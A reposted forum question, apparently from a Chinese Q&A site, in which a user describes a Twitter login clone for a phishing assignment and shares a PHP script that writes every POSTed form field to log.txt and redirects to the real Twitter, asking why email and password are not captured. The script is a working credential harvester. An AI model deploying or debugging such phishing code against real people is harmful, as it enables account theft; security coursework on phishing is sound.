dpw30157 2019-07-19 22:18
浏览 99

Twitter网络钓鱼不发送正确的日志

I'm doing a phishing assignment for computer security and I'm trying to understand how phishing works for educational purposes.

The index.html of mine is twitter.com and I edited it so that it uses a file.php instead of logging in. The file.php writes down what the user (me, in this case) typed as email and password and saves it as a log.txt, then redirects the user to the real twitter.com. However there's a problem, it doesn't save the email and password, instead it saves what's next after the login in the html page:

session=
return_to_ssl=true
scribe_log=
redirect_after_login=/
authenticity_token=efda136fc6b4513493a115270e13f102e8bef7ef
ui_metrics={"rf":{"bunch-of-numbers+letters...

This is the file.php:

<?php
header ('Location: http://www.twitter.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "
");
}
fwrite($handle, "
");
fclose($handle);
exit;
?>

What's the problem? Thanks in advance.

  • 写回答

0条回答 默认 最新

    报告相同问题?

    悬赏问题

    • ¥15 HFSS 中的 H 场图与 MATLAB 中绘制的 B1 场 部分对应不上
    • ¥15 如何在scanpy上做差异基因和通路富集?
    • ¥20 关于#硬件工程#的问题,请各位专家解答!
    • ¥15 关于#matlab#的问题:期望的系统闭环传递函数为G(s)=wn^2/s^2+2¢wn+wn^2阻尼系数¢=0.707,使系统具有较小的超调量
    • ¥15 FLUENT如何实现在堆积颗粒的上表面加载高斯热源
    • ¥30 截图中的mathematics程序转换成matlab
    • ¥15 动力学代码报错,维度不匹配
    • ¥15 Power query添加列问题
    • ¥50 Kubernetes&Fission&Eleasticsearch
    • ¥15 報錯:Person is not mapped,如何解決?